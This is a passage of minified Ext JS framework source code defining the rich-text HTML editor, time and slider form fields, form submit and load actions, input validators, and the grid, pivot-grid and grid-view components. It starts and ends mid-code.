b.insertunorderedlist.toggle(c.queryCommandState("insertunorderedlist"))
}
Ext.menu.MenuMgr.hideAll();
this.syncValue()
}, relayBtnCmd:function (a) {
this.relayCmd(a.getItemId())
}, relayCmd:function (b, a) {
(function () {
this.focus();
this.execCmd(b, a);
this.updateToolbar()
}).defer(10, this)
}, execCmd:function (b, a) {
var c = this.getDoc();
c.execCommand(b, false, a === undefined ? null : a);
this.syncValue()
}, applyCommand:function (b) {
if (b.ctrlKey) {
var d = b.getCharCode(), a;
if (d > 0) {
d = String.fromCharCode(d);
switch (d) {
case"b":
a = "bold";
break;
case"i":
a = "italic";
break;
case"u":
a = "underline";
break
}
if (a) {
this.win.focus();
this.execCmd(a);
this.deferFocus();
b.preventDefault()
}
}
}
}, insertAtCursor:function (c) {
if (!this.activated) {
return
}
if (Ext.isIE) {
this.win.focus();
var b = this.getDoc(), a = b.selection.createRange();
if (a) {
a.pasteHTML(c);
this.syncValue();
this.deferFocus()
}
} else {
this.win.focus();
this.execCmd("InsertHTML", c);
this.deferFocus()
}
}, fixKeys:function () {
if (Ext.isIE) {
return function (g) {
var a = g.getKey(), d = this.getDoc(), b;
if (a == g.TAB) {
g.stopEvent();
b = d.selection.createRange();
if (b) {
b.collapse(true);
b.pasteHTML(" ");
this.deferFocus()
}
} else {
if (a == g.ENTER) {
b = d.selection.createRange();
if (b) {
var c = b.parentElement();
if (!c || c.tagName.toLowerCase() != "li") {
g.stopEvent();
b.pasteHTML("<br />");
b.collapse(false);
b.select()
}
}
}
}
}
} else {
if (Ext.isOpera) {
return function (b) {
var a = b.getKey();
if (a == b.TAB) {
b.stopEvent();
this.win.focus();
this.execCmd("InsertHTML", " ");
this.deferFocus()
}
}
} else {
if (Ext.isWebKit) {
return function (b) {
var a = b.getKey();
if (a == b.TAB) {
b.stopEvent();
this.execCmd("InsertText", "\t");
this.deferFocus()
} else {
if (a == b.ENTER) {
b.stopEvent();
this.execCmd("InsertHtml", "<br /><br />");
this.deferFocus()
}
}
}
}
}
}
}(), getToolbar:function () {
return this.tb
}, buttonTips:{bold:{title:"Bold (Ctrl+B)", text:"Make the selected text bold.", cls:"x-html-editor-tip"}, italic:{title:"Italic (Ctrl+I)", text:"Make the selected text italic.", cls:"x-html-editor-tip"}, underline:{title:"Underline (Ctrl+U)", text:"Underline the selected text.", cls:"x-html-editor-tip"}, increasefontsize:{title:"Grow Text", text:"Increase the font size.", cls:"x-html-editor-tip"}, decreasefontsize:{title:"Shrink Text", text:"Decrease the font size.", cls:"x-html-editor-tip"}, backcolor:{title:"Text Highlight Color", text:"Change the background color of the selected text.", cls:"x-html-editor-tip"}, forecolor:{title:"Font Color", text:"Change the color of the selected text.", cls:"x-html-editor-tip"}, justifyleft:{title:"Align Text Left", text:"Align text to the left.", cls:"x-html-editor-tip"}, justifycenter:{title:"Center Text", text:"Center text in the editor.", cls:"x-html-editor-tip"}, justifyright:{title:"Align Text Right", text:"Align text to the right.", cls:"x-html-editor-tip"}, insertunorderedlist:{title:"Bullet List", text:"Start a bulleted list.", cls:"x-html-editor-tip"}, insertorderedlist:{title:"Numbered List", text:"Start a numbered list.", cls:"x-html-editor-tip"}, createlink:{title:"Hyperlink", text:"Make the selected text a hyperlink.", cls:"x-html-editor-tip"}, sourceedit:{title:"Source Edit", text:"Switch to source editing mode.", cls:"x-html-editor-tip"}}});
Ext.reg("htmleditor", Ext.form.HtmlEditor);
Ext.form.TimeField = Ext.extend(Ext.form.ComboBox, {minValue:undefined, maxValue:undefined, minText:"The time in this field must be equal to or after {0}", maxText:"The time in this field must be equal to or before {0}", invalidText:"{0} is not a valid time", format:"g:i A", altFormats:"g:ia|g:iA|g:i a|g:i A|h:i|g:i|H:i|ga|ha|gA|h a|g a|g A|gi|hi|gia|hia|g|H|gi a|hi a|giA|hiA|gi A|hi A", increment:15, mode:"local", triggerAction:"all", typeAhead:false, initDate:"1/1/2008", initDateFormat:"j/n/Y", initComponent:function () {
if (Ext.isDefined(this.minValue)) {
this.setMinValue(this.minValue, true)
}
if (Ext.isDefined(this.maxValue)) {
this.setMaxValue(this.maxValue, true)
}
if (!this.store) {
this.generateStore(true)
}
Ext.form.TimeField.superclass.initComponent.call(this)
}, setMinValue:function (b, a) {
this.setLimit(b, true, a);
return this
}, setMaxValue:function (b, a) {
this.setLimit(b, false, a);
return this
}, generateStore:function (b) {
var c = this.minValue || new Date(this.initDate).clearTime(), a = this.maxValue || new Date(this.initDate).clearTime().add("mi", (24 * 60) - 1), d = [];
while (c <= a) {
d.push(c.dateFormat(this.format));
c = c.add("mi", this.increment)
}
this.bindStore(d, b)
}, setLimit:function (b, g, a) {
var e;
if (Ext.isString(b)) {
e = this.parseDate(b)
} else {
if (Ext.isDate(b)) {
e = b
}
}
if (e) {
var c = new Date(this.initDate).clearTime();
c.setHours(e.getHours(), e.getMinutes(), e.getSeconds(), e.getMilliseconds());
this[g ? "minValue" : "maxValue"] = c;
if (!a) {
this.generateStore()
}
}
}, getValue:function () {
var a = Ext.form.TimeField.superclass.getValue.call(this);
return this.formatDate(this.parseDate(a)) || ""
}, setValue:function (a) {
return Ext.form.TimeField.superclass.setValue.call(this, this.formatDate(this.parseDate(a)))
}, validateValue:Ext.form.DateField.prototype.validateValue, formatDate:Ext.form.DateField.prototype.formatDate, parseDate:function (h) {
if (!h || Ext.isDate(h)) {
return h
}
var j = this.initDate + " ", g = this.initDateFormat + " ", b = Date.parseDate(j + h, g + this.format), c = this.altFormats;
if (!b && c) {
if (!this.altFormatsArray) {
this.altFormatsArray = c.split("|")
}
for (var e = 0, d = this.altFormatsArray, a = d.length; e < a && !b; e++) {
b = Date.parseDate(j + h, g + d[e])
}
}
return b
}});
Ext.reg("timefield", Ext.form.TimeField);
Ext.form.SliderField = Ext.extend(Ext.form.Field, {useTips:true, tipText:null, actionMode:"wrap", initComponent:function () {
var b = Ext.copyTo({id:this.id + "-slider"}, this.initialConfig, ["vertical", "minValue", "maxValue", "decimalPrecision", "keyIncrement", "increment", "clickToChange", "animate"]);
if (this.useTips) {
var a = this.tipText ? {getText:this.tipText} : {};
b.plugins = [new Ext.slider.Tip(a)]
}
this.slider = new Ext.Slider(b);
Ext.form.SliderField.superclass.initComponent.call(this)
}, onRender:function (b, a) {
this.autoCreate = {id:this.id, name:this.name, type:"hidden", tag:"input"};
Ext.form.SliderField.superclass.onRender.call(this, b, a);
this.wrap = this.el.wrap({cls:"x-form-field-wrap"});
this.resizeEl = this.positionEl = this.wrap;
this.slider.render(this.wrap)
}, onResize:function (b, c, d, a) {
Ext.form.SliderField.superclass.onResize.call(this, b, c, d, a);
this.slider.setSize(b, c)
}, initEvents:function () {
Ext.form.SliderField.superclass.initEvents.call(this);
this.slider.on("change", this.onChange, this)
}, onChange:function (b, a) {
this.setValue(a, undefined, true)
}, onEnable:function () {
Ext.form.SliderField.superclass.onEnable.call(this);
this.slider.enable()
}, onDisable:function () {
Ext.form.SliderField.superclass.onDisable.call(this);
this.slider.disable()
}, beforeDestroy:function () {
Ext.destroy(this.slider);
Ext.form.SliderField.superclass.beforeDestroy.call(this)
}, alignErrorIcon:function () {
this.errorIcon.alignTo(this.slider.el, "tl-tr", [2, 0])
}, setMinValue:function (a) {
this.slider.setMinValue(a);
return this
}, setMaxValue:function (a) {
this.slider.setMaxValue(a);
return this
}, setValue:function (c, b, a) {
if (!a) {
this.slider.setValue(c, b)
}
return Ext.form.SliderField.superclass.setValue.call(this, this.slider.getValue())
}, getValue:function () {
return this.slider.getValue()
}});
Ext.reg("sliderfield", Ext.form.SliderField);
Ext.form.Label = Ext.extend(Ext.BoxComponent, {onRender:function (b, a) {
if (!this.el) {
this.el = document.createElement("label");
this.el.id = this.getId();
this.el.innerHTML = this.text ? Ext.util.Format.htmlEncode(this.text) : (this.html || "");
if (this.forId) {
this.el.setAttribute("for", this.forId)
}
}
Ext.form.Label.superclass.onRender.call(this, b, a)
}, setText:function (a, b) {
var c = b === false;
this[!c ? "text" : "html"] = a;
delete this[c ? "text" : "html"];
if (this.rendered) {
this.el.dom.innerHTML = b !== false ? Ext.util.Format.htmlEncode(a) : a
}
return this
}});
Ext.reg("label", Ext.form.Label);
Ext.form.Action = function (b, a) {
this.form = b;
this.options = a || {}
};
Ext.form.Action.CLIENT_INVALID = "client";
Ext.form.Action.SERVER_INVALID = "server";
Ext.form.Action.CONNECT_FAILURE = "connect";
Ext.form.Action.LOAD_FAILURE = "load";
Ext.form.Action.prototype = {type:"default", run:function (a) {
}, success:function (a) {
}, handleResponse:function (a) {
}, failure:function (a) {
this.response = a;
this.failureType = Ext.form.Action.CONNECT_FAILURE;
this.form.afterAction(this, false)
}, processResponse:function (a) {
this.response = a;
if (!a.responseText && !a.responseXML) {
return true
}
this.result = this.handleResponse(a);
return this.result
}, decodeResponse:function (a) {
try {
return Ext.decode(a.responseText)
} catch (b) {
return false
}
}, getUrl:function (c) {
var a = this.options.url || this.form.url || this.form.el.dom.action;
if (c) {
var b = this.getParams();
if (b) {
a = Ext.urlAppend(a, b)
}
}
return a
}, getMethod:function () {
return(this.options.method || this.form.method || this.form.el.dom.method || "POST").toUpperCase()
}, getParams:function () {
var a = this.form.baseParams;
var b = this.options.params;
if (b) {
if (typeof b == "object") {
b = Ext.urlEncode(Ext.applyIf(b, a))
} else {
if (typeof b == "string" && a) {
b += "&" + Ext.urlEncode(a)
}
}
} else {
if (a) {
b = Ext.urlEncode(a)
}
}
return b
}, createCallback:function (a) {
var a = a || {};
return{success:this.success, failure:this.failure, scope:this, timeout:(a.timeout * 1000) || (this.form.timeout * 1000), upload:this.form.fileUpload ? this.success : undefined}
}};
Ext.form.Action.Submit = function (b, a) {
Ext.form.Action.Submit.superclass.constructor.call(this, b, a)
};
Ext.extend(Ext.form.Action.Submit, Ext.form.Action, {type:"submit", run:function () {
var e = this.options, g = this.getMethod(), d = g == "GET";
if (e.clientValidation === false || this.form.isValid()) {
if (e.submitEmptyText === false) {
var a = this.form.items, c = [], b = function (h) {
if (h.el.getValue() == h.emptyText) {
c.push(h);
h.el.dom.value = ""
}
if (h.isComposite && h.rendered) {
h.items.each(b)
}
};
a.each(b)
}
Ext.Ajax.request(Ext.apply(this.createCallback(e), {form:this.form.el.dom, url:this.getUrl(d), method:g, headers:e.headers, params:!d ? this.getParams() : null, isUpload:this.form.fileUpload}));
if (e.submitEmptyText === false) {
Ext.each(c, function (h) {
if (h.applyEmptyText) {
h.applyEmptyText()
}
})
}
} else {
if (e.clientValidation !== false) {
this.failureType = Ext.form.Action.CLIENT_INVALID;
this.form.afterAction(this, false)
}
}
}, success:function (b) {
var a = this.processResponse(b);
if (a === true || a.success) {
this.form.afterAction(this, true);
return
}
if (a.errors) {
this.form.markInvalid(a.errors)
}
this.failureType = Ext.form.Action.SERVER_INVALID;
this.form.afterAction(this, false)
}, handleResponse:function (c) {
if (this.form.errorReader) {
var b = this.form.errorReader.read(c);
var g = [];
if (b.records) {
for (var d = 0, a = b.records.length; d < a; d++) {
var e = b.records[d];
g[d] = e.data
}
}
if (g.length < 1) {
g = null
}
return{success:b.success, errors:g}
}
return this.decodeResponse(c)
}});
Ext.form.Action.Load = function (b, a) {
Ext.form.Action.Load.superclass.constructor.call(this, b, a);
this.reader = this.form.reader
};
Ext.extend(Ext.form.Action.Load, Ext.form.Action, {type:"load", run:function () {
Ext.Ajax.request(Ext.apply(this.createCallback(this.options), {method:this.getMethod(), url:this.getUrl(false), headers:this.options.headers, params:this.getParams()}))
}, success:function (b) {
var a = this.processResponse(b);
if (a === true || !a.success || !a.data) {
this.failureType = Ext.form.Action.LOAD_FAILURE;
this.form.afterAction(this, false);
return
}
this.form.clearInvalid();
this.form.setValues(a.data);
this.form.afterAction(this, true)
}, handleResponse:function (b) {
if (this.form.reader) {
var a = this.form.reader.read(b);
var c = a.records && a.records[0] ? a.records[0].data : null;
return{success:a.success, data:c}
}
return this.decodeResponse(b)
}});
Ext.form.Action.DirectLoad = Ext.extend(Ext.form.Action.Load, {constructor:function (b, a) {
Ext.form.Action.DirectLoad.superclass.constructor.call(this, b, a)
}, type:"directload", run:function () {
var a = this.getParams();
a.push(this.success, this);
this.form.api.load.apply(window, a)
}, getParams:function () {
var c = [], h = {};
var e = this.form.baseParams;
var g = this.options.params;
Ext.apply(h, g, e);
var b = this.form.paramOrder;
if (b) {
for (var d = 0, a = b.length; d < a; d++) {
c.push(h[b[d]])
}
} else {
if (this.form.paramsAsHash) {
c.push(h)
}
}
return c
}, processResponse:function (a) {
this.result = a;
return a
}, success:function (a, b) {
if (b.type == Ext.Direct.exceptions.SERVER) {
a = {}
}
Ext.form.Action.DirectLoad.superclass.success.call(this, a)
}});
Ext.form.Action.DirectSubmit = Ext.extend(Ext.form.Action.Submit, {constructor:function (b, a) {
Ext.form.Action.DirectSubmit.superclass.constructor.call(this, b, a)
}, type:"directsubmit", run:function () {
var a = this.options;
if (a.clientValidation === false || this.form.isValid()) {
this.success.params = this.getParams();
this.form.api.submit(this.form.el.dom, this.success, this)
} else {
if (a.clientValidation !== false) {
this.failureType = Ext.form.Action.CLIENT_INVALID;
this.form.afterAction(this, false)
}
}
}, getParams:function () {
var c = {};
var a = this.form.baseParams;
var b = this.options.params;
Ext.apply(c, b, a);
return c
}, processResponse:function (a) {
this.result = a;
return a
}, success:function (a, b) {
if (b.type == Ext.Direct.exceptions.SERVER) {
a = {}
}
Ext.form.Action.DirectSubmit.superclass.success.call(this, a)
}});
Ext.form.Action.ACTION_TYPES = {load:Ext.form.Action.Load, submit:Ext.form.Action.Submit, directload:Ext.form.Action.DirectLoad, directsubmit:Ext.form.Action.DirectSubmit};
Ext.form.VTypes = function () {
var c = /^[a-zA-Z_]+$/, d = /^[a-zA-Z0-9_]+$/, b = /^(\w+)([\-+.\'][\w]+)*@(\w[\-\w]*\.){1,5}([A-Za-z]){2,6}$/, a = /(((^https?)|(^ftp)):\/\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;
return{email:function (e) {
return b.test(e)
}, emailText:'This field should be an e-mail address in the format "[email protected]"', emailMask:/[a-z0-9_\.\-\+\'@]/i, url:function (e) {
return a.test(e)
}, urlText:'This field should be a URL in the format "http://www.example.com"', alpha:function (e) {
return c.test(e)
}, alphaText:"This field should only contain letters and _", alphaMask:/[a-z_]/i, alphanum:function (e) {
return d.test(e)
}, alphanumText:"This field should only contain letters, numbers and _", alphanumMask:/[a-z0-9_]/i}
}();
Ext.grid.GridPanel = Ext.extend(Ext.Panel, {autoExpandColumn:false, autoExpandMax:1000, autoExpandMin:50, columnLines:false, ddText:"{0} selected row{1}", deferRowRender:true, enableColumnHide:true, enableColumnMove:true, enableDragDrop:false, enableHdMenu:true, loadMask:false, minColumnWidth:25, stripeRows:false, trackMouseOver:true, stateEvents:["columnmove", "columnresize", "sortchange", "groupchange"], view:null, bubbleEvents:[], rendered:false, viewReady:false, initComponent:function () {
Ext.grid.GridPanel.superclass.initComponent.call(this);
if (this.columnLines) {
this.cls = (this.cls || "") + " x-grid-with-col-lines"
}
this.autoScroll = false;
this.autoWidth = false;
if (Ext.isArray(this.columns)) {
this.colModel = new Ext.grid.ColumnModel(this.columns);
delete this.columns
}
if (this.ds) {
this.store = this.ds;
delete this.ds
}
if (this.cm) {
this.colModel = this.cm;
delete this.cm
}
if (this.sm) {
this.selModel = this.sm;
delete this.sm
}
this.store = Ext.StoreMgr.lookup(this.store);
this.addEvents("click", "dblclick", "contextmenu", "mousedown", "mouseup", "mouseover", "mouseout", "keypress", "keydown", "cellmousedown", "rowmousedown", "headermousedown", "groupmousedown", "rowbodymousedown", "containermousedown", "cellclick", "celldblclick", "rowclick", "rowdblclick", "headerclick", "headerdblclick", "groupclick", "groupdblclick", "containerclick", "containerdblclick", "rowbodyclick", "rowbodydblclick", "rowcontextmenu", "cellcontextmenu", "headercontextmenu", "groupcontextmenu", "containercontextmenu", "rowbodycontextmenu", "bodyscroll", "columnresize", "columnmove", "sortchange", "groupchange", "reconfigure", "viewready")
}, onRender:function (d, a) {
Ext.grid.GridPanel.superclass.onRender.apply(this, arguments);
var e = this.getGridEl();
this.el.addClass("x-grid-panel");
this.mon(e, {scope:this, mousedown:this.onMouseDown, click:this.onClick, dblclick:this.onDblClick, contextmenu:this.onContextMenu});
this.relayEvents(e, ["mousedown", "mouseup", "mouseover", "mouseout", "keypress", "keydown"]);
var b = this.getView();
b.init(this);
b.render();
this.getSelectionModel().init(this)
}, initEvents:function () {
Ext.grid.GridPanel.superclass.initEvents.call(this);
if (this.loadMask) {
this.loadMask = new Ext.LoadMask(this.bwrap, Ext.apply({store:this.store}, this.loadMask))
}
}, initStateEvents:function () {
Ext.grid.GridPanel.superclass.initStateEvents.call(this);
this.mon(this.colModel, "hiddenchange", this.saveState, this, {delay:100})
}, applyState:function (a) {
var k = this.colModel, g = a.columns, j = this.store, m, h, l;
if (g) {
for (var d = 0, e = g.length; d < e; d++) {
m = g[d];
h = k.getColumnById(m.id);
if (h) {
l = k.getIndexById(m.id);
k.setState(l, {hidden:m.hidden, width:m.width, sortable:m.sortable});
if (l != d) {
k.moveColumn(l, d)
}
}
}
}
if (j) {
m = a.sort;
if (m) {
j[j.remoteSort ? "setDefaultSort" : "sort"](m.field, m.direction)
}
m = a.group;
if (j.groupBy) {
if (m) {
j.groupBy(m)
} else {
j.clearGrouping()
}
}
}
var b = Ext.apply({}, a);
delete b.columns;
delete b.sort;
Ext.grid.GridPanel.superclass.applyState.call(this, b)
}, getState:function () {
var g = {columns:[]}, b = this.store, e, a;
for (var d = 0, h; (h = this.colModel.config[d]); d++) {
g.columns[d] = {id:h.id, width:h.width};
if (h.hidden) {
g.columns[d].hidden = true
}
if (h.sortable) {
g.columns[d].sortable = true
}
}
if (b) {
e = b.getSortState();
if (e) {
g.sort = e
}
if (b.getGroupState) {
a = b.getGroupState();
if (a) {
g.group = a
}
}
}
return g
}, afterRender:function () {
Ext.grid.GridPanel.superclass.afterRender.call(this);
var a = this.view;
this.on("bodyresize", a.layout, a);
a.layout(true);
if (this.deferRowRender) {
if (!this.deferRowRenderTask) {
this.deferRowRenderTask = new Ext.util.DelayedTask(a.afterRender, this.view)
}
this.deferRowRenderTask.delay(10)
} else {
a.afterRender()
}
this.viewReady = true
}, reconfigure:function (a, b) {
var c = this.rendered;
if (c) {
if (this.loadMask) {
this.loadMask.destroy();
this.loadMask = new Ext.LoadMask(this.bwrap, Ext.apply({}, {store:a}, this.initialConfig.loadMask))
}
}
if (this.view) {
this.view.initData(a, b)
}
this.store = a;
this.colModel = b;
if (c) {
this.view.refresh(true)
}
this.fireEvent("reconfigure", this, a, b)
}, onDestroy:function () {
if (this.deferRowRenderTask && this.deferRowRenderTask.cancel) {
this.deferRowRenderTask.cancel()
}
if (this.rendered) {
Ext.destroy(this.view, this.loadMask)
} else {
if (this.store && this.store.autoDestroy) {
this.store.destroy()
}
}
Ext.destroy(this.colModel, this.selModel);
this.store = this.selModel = this.colModel = this.view = this.loadMask = null;
Ext.grid.GridPanel.superclass.onDestroy.call(this)
}, processEvent:function (a, b) {
this.view.processEvent(a, b)
}, onClick:function (a) {
this.processEvent("click", a)
}, onMouseDown:function (a) {
this.processEvent("mousedown", a)
}, onContextMenu:function (b, a) {
this.processEvent("contextmenu", b)
}, onDblClick:function (a) {
this.processEvent("dblclick", a)
}, walkCells:function (k, c, b, e, j) {
var i = this.colModel, g = i.getColumnCount(), a = this.store, h = a.getCount(), d = true;
if (b < 0) {
if (c < 0) {
k--;
d = false
}
while (k >= 0) {
if (!d) {
c = g - 1
}
d = false;
while (c >= 0) {
if (e.call(j || this, k, c, i) === true) {
return[k, c]
}
c--
}
k--
}
} else {
if (c >= g) {
k++;
d = false
}
while (k < h) {
if (!d) {
c = 0
}
d = false;
while (c < g) {
if (e.call(j || this, k, c, i) === true) {
return[k, c]
}
c++
}
k++
}
}
return null
}, getGridEl:function () {
return this.body
}, stopEditing:Ext.emptyFn, getSelectionModel:function () {
if (!this.selModel) {
this.selModel = new Ext.grid.RowSelectionModel(this.disableSelection ? {selectRow:Ext.emptyFn} : null)
}
return this.selModel
}, getStore:function () {
return this.store
}, getColumnModel:function () {
return this.colModel
}, getView:function () {
if (!this.view) {
this.view = new Ext.grid.GridView(this.viewConfig)
}
return this.view
}, getDragDropText:function () {
var a = this.selModel.getCount();
return String.format(this.ddText, a, a == 1 ? "" : "s")
}});
Ext.reg("grid", Ext.grid.GridPanel);
Ext.grid.PivotGrid = Ext.extend(Ext.grid.GridPanel, {aggregator:"sum", renderer:undefined, initComponent:function () {
Ext.grid.PivotGrid.superclass.initComponent.apply(this, arguments);
this.initAxes();
this.enableColumnResize = false;
this.viewConfig = Ext.apply(this.viewConfig || {}, {forceFit:true});
this.colModel = new Ext.grid.ColumnModel({})
}, getAggregator:function () {
if (typeof this.aggregator == "string") {
return Ext.grid.PivotAggregatorMgr.types[this.aggregator]
} else {
return this.aggregator
}
}, setAggregator:function (a) {
this.aggregator = a
}, setMeasure:function (a) {
this.measure = a
}, setLeftAxis:function (b, a) {
this.leftAxis = b;
if (a) {
this.view.refresh()
}
}, setTopAxis:function (b, a) {
this.topAxis = b;
if (a) {
this.view.refresh()
}
}, initAxes:function () {
var a = Ext.grid.PivotAxis;
if (!(this.leftAxis instanceof a)) {
this.setLeftAxis(new a({orientation:"vertical", dimensions:this.leftAxis || [], store:this.store}))
}
if (!(this.topAxis instanceof a)) {
this.setTopAxis(new a({orientation:"horizontal", dimensions:this.topAxis || [], store:this.store}))
}
}, extractData:function () {
var c = this.store.data.items, s = c.length, q = [], h, g, e, d;
if (s == 0) {
return[]
}
var l = this.leftAxis.getTuples(), o = l.length, m = this.topAxis.getTuples(), a = m.length, b = this.getAggregator();
for (g = 0; g < s; g++) {
h = c[g];
for (e = 0; e < o; e++) {
q[e] = q[e] || [];
if (l[e].matcher(h) === true) {
for (d = 0; d < a; d++) {
q[e][d] = q[e][d] || [];
if (m[d].matcher(h)) {
q[e][d].push(h)
}
}
}
}
}
var n = q.length, p, r;
for (g = 0; g < n; g++) {
r = q[g];
p = r.length;
for (e = 0; e < p; e++) {
q[g][e] = b(q[g][e], this.measure)
}
}
return q
}, getView:function () {
if (!this.view) {
this.view = new Ext.grid.PivotGridView(this.viewConfig)
}
return this.view
}});
Ext.reg("pivotgrid", Ext.grid.PivotGrid);
Ext.grid.PivotAggregatorMgr = new Ext.AbstractManager();
Ext.grid.PivotAggregatorMgr.registerType("sum", function (a, c) {
var e = a.length, d = 0, b;
for (b = 0; b < e; b++) {
d += a[b].get(c)
}
return d
});
Ext.grid.PivotAggregatorMgr.registerType("avg", function (a, c) {
var e = a.length, d = 0, b;
for (b = 0; b < e; b++) {
d += a[b].get(c)
}
return(d / e) || "n/a"
});
Ext.grid.PivotAggregatorMgr.registerType("min", function (a, c) {
var e = [], d = a.length, b;
for (b = 0; b < d; b++) {
e.push(a[b].get(c))
}
return Math.min.apply(this, e) || "n/a"
});
Ext.grid.PivotAggregatorMgr.registerType("max", function (a, c) {
var e = [], d = a.length, b;
for (b = 0; b < d; b++) {
e.push(a[b].get(c))
}
return Math.max.apply(this, e) || "n/a"
});
Ext.grid.PivotAggregatorMgr.registerType("count", function (a, b) {
return a.length
});
Ext.grid.GridView = Ext.extend(Ext.util.Observable, {deferEmptyText:true, scrollOffset:undefined, autoFill:false, forceFit:false, sortClasses:["sort-asc", "sort-desc"], sortAscText:"Sort Ascending", sortDescText:"Sort Descending", columnsText:"Columns", selectedRowClass:"x-grid3-row-selected", borderWidth:2, tdClass:"x-grid3-cell", hdCls:"x-grid3-hd", markDirty:true, cellSelectorDepth:4, rowSelectorDepth:10, rowBodySelectorDepth:10, cellSelector:"td.x-grid3-cell", rowSelector:"div.x-grid3-row", rowBodySelector:"div.x-grid3-row-body", firstRowCls:"x-grid3-row-first", lastRowCls:"x-grid3-row-last", rowClsRe:/(?:^|\s+)x-grid3-row-(first|last|alt)(?:\s+|$)/g, headerMenuOpenCls:"x-grid3-hd-menu-open", rowOverCls:"x-grid3-row-over", constructor:function (a) {
Ext.apply(this, a);
this.addEvents("beforerowremoved", "beforerowsinserted", "beforerefresh", "rowremoved", "rowsinserted", "rowupdated", "refresh");
Ext.grid.GridView.superclass.constructor.call(this)
}, masterTpl:new Ext.Template('<div class="x-grid3" hidefocus="true">', '<div class="x-grid3-viewport">', '<div class="x-grid3-header">', '<div class="x-grid3-header-inner">', '<div class="x-grid3-header-offset" style="{ostyle}">{header}</div>', "</div>", '<div class="x-clear"></div>', "</div>", '<div class="x-grid3-scroller">', '<div class="x-grid3-body" style="{bstyle}">{body}</div>', '<a href="#" class="x-grid3-focus" tabIndex="-1"></a>', "</div>", "</div>", '<div class="x-grid3-resize-marker"> </div>', '<div class="x-grid3-resize-proxy"> </div>', "</div>"), headerTpl:new Ext.Template('<table border="0" cellspacing="0" cellpadding="0" style="{tstyle}">', "<thead>", '<tr class="x-grid3-hd-row">{cells}</tr>', "</thead>", "</table>"), bodyTpl:new Ext.Template("{rows}"), cellTpl:new Ext.Template('<td class="x-grid3-col x-grid3-cell x-grid3-td-{id} {css}" style="{style}" tabIndex="0" {cellAttr}>', '<div class="x-grid3-cell-inner x-grid3-col-{id}" unselectable="on" {attr}>{value}</div>', "</td>"), initTemplates:function () {
var c = this.templates || {}, d, b, g = new Ext.Template('<td class="x-grid3-hd x-grid3-cell x-grid3-td-{id} {css}" style="{style}">', '<div {tooltip} {attr} class="x-grid3-hd-inner x-grid3-hd-{id}" unselectable="on" style="{istyle}">', this.grid.enableHdMenu ? '<a class="x-grid3-hd-btn" href="#"></a>' : "", "{value}", '<img alt="" class="x-grid3-sort-icon" src="', Ext.BLANK_IMAGE_URL, '" />', "</div>", "</td>"), a = ['<tr class="x-grid3-row-body-tr" style="{bodyStyle}">', '<td colspan="{cols}" class="x-grid3-body-cell" tabIndex="0" hidefocus="on">', '<div class="x-grid3-row-body">{body}</div>', "</td>", "</tr>"].join(""), e = ['<table class="x-grid3-row-table" border="0" cellspacing="0" cellpadding="0" style="{tstyle}">', "<tbody>", "<tr>{cells}</tr>", this.enableRowBody ? a : "", "</tbody>", "</table>"].join("");
Ext.applyIf(c, {hcell:g, cell:this.cellTpl, body:this.bodyTpl, header:this.headerTpl, master:this.masterTpl, row:new Ext.Template('<div class="x-grid3-row {alt}" style="{tstyle}">' + e + "</div>"), rowInner:new Ext.Template(e)});
for (b in c) {
d = c[b];
if (d && Ext.isFunction(d.compile) && !d.compiled) {
d.disableFormats = true;
d.compile()
}
}
this.templates = c;
this.colRe = new RegExp("x-grid3-td-([^\\s]+)", "")
}, fly:function (a) {
if (!this._flyweight) {
this._flyweight = new Ext.Element.Flyweight(document.body)
}
this._flyweight.dom = a;
return this._flyweight
}, getEditorParent:function () {
return this.scroller.dom
}, initElements:function () {
var b = Ext.Element, d = Ext.get(this.grid.getGridEl().dom.firstChild), e = new b(d.child("div.x-grid3-viewport")), c = new b(e.child("div.x-grid3-header")), a = new b(e.child("div.x-grid3-scroller"));
if (this.grid.hideHeaders) {
c.setDisplayed(false)
}
if (this.forceFit) {
a.setStyle("overflow-x", "hidden")
}
Ext.apply(this, {el:d, mainWrap:e, scroller:a, mainHd:c, innerHd:c.child("div.x-grid3-header-inner").dom, mainBody:new b(b.fly(a).child("div.x-grid3-body")), focusEl:new b(b.fly(a).child("a")), resizeMarker:new b(d.child("div.x-grid3-resize-marker")), resizeProxy:new b(d.child("div.x-grid3-resize-proxy"))});
this.focusEl.swallowEvent("click", true)
}, getRows:function () {
return this.hasRows() ? this.mainBody.dom.childNodes : []
}, findCell:function (a) {
if (!a) {
return false
}
return this.fly(a).findParent(this.cellSelector, this.cellSelectorDepth)
}, findCellIndex:function (d, c) {
var b = this.findCell(d), a;
if (b) {
a = this.fly(b).hasClass(c);
if (!c || a) {
return this.getCellIndex(b)
}
}
return false
}, getCellIndex:function (b) {
if (b) {
var a = b.className.match(this.colRe);
if (a && a[1]) {
return this.cm.getIndexById(a[1])
}
}
return false
}, findHeaderCell:function (b) {
var a = this.findCell(b);
return a && this.fly(a).hasClass(this.hdCls) ? a : null
}, findHeaderIndex:function (a) {
return this.findCellIndex(a, this.hdCls)
}, findRow:function (a) {
if (!a) {
return false
}
return this.fly(a).findParent(this.rowSelector, this.rowSelectorDepth)
}, findRowIndex:function (a) {
var b = this.findRow(a);
return b ? b.rowIndex : false
}, findRowBody:function (a) {
if (!a) {
return false
}
return this.fly(a).findParent(this.rowBodySelector, this.rowBodySelectorDepth)
}, getRow:function (a) {
return this.getRows()[a]
}, getCell:function (b, a) {
return Ext.fly(this.getRow(b)).query(this.cellSelector)[a]
}, getHeaderCell:function (a) {
return this.mainHd.dom.getElementsByTagName("td")[a]
}, addRowClass:function (b, a) {
var c = this.getRow(b);
if (c) {
this.fly(c).addClass(a)
}
}, removeRowClass:function (c, a) {
var b = this.getRow(c);
if (b) {
this.fly(b).removeClass(a)
}
}, removeRow:function (a) {
Ext.removeNode(this.getRow(a));
this.syncFocusEl(a)
}, removeRows:function (c, a) {
var b = this.mainBody.dom, d;
for (d = c; d <= a; d++) {
Ext.removeNode(b.childNodes[c])
}
this.syncFocusEl(c)
}, getScrollState:function () {
var a = this.scroller.dom;
return{left:a.scrollLeft, top:a.scrollTop}
}, restoreScroll:function (a) {
var b = this.scroller.dom;
b.scrollLeft = a.left;
b.scrollTop = a.top
}, scrollToTop:function () {
var a = this.scroller.dom;
a.scrollTop = 0;
a.scrollLeft = 0
}, syncScroll:function () {
this.syncHeaderScroll();
var a = this.scroller.dom;
this.grid.fireEvent("bodyscroll", a.scrollLeft, a.scrollTop)
